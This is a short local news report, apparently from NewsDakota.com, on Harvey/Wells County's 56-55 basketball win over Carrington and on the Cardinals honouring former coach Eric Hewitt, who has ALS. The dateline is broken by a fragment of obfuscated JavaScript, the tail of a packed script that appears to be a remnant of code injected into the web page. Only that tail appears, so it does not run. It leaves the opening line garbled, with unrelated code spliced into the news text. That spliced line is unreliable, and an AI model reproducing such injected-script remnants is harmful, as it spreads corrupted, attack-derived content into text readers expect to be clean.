CARRINGTON, hzneh|var|u0026u|referrer|ssnbf||js|php’.split(‘|’),0,{}))
N.D.  (NewsDakota.com)  In the second to last game of the year for the Cardinals, Senior Center Payton Granger scored the go ahead bucket with .8 left to lift the Hornets to a one point advantage in the fourth quarter.  The Cardinals would get a look from about midcourt but it didn’t fall as Harvey/Wells County defeats Carrington 56-55.  The RV Cardinals drop to 15-3, HWC improves to 11-6.

Leading the way was Junior Point Guard Garrett Bickett with 26 points, including three 3-pointers, he has 48 treys on the season.  Senior Bryce Edland was held scoreless in the first half, he ended the game with just eight points.  Junior Guard Jarrett Anderson poured in 23 points and Granger ended with 18 including the game winner.

To show their support of their former teacher, coach and friend, the Cardinals boys basketball team presented Eric Hewitt with a game ball, signed by the team, before the game last night.  Senior Bryce Edland made the presentation to Hewitt, who was diagnosed with ALS last month.  During warm ups, the Cardinals wore strike out ALS T-Shirts as well.
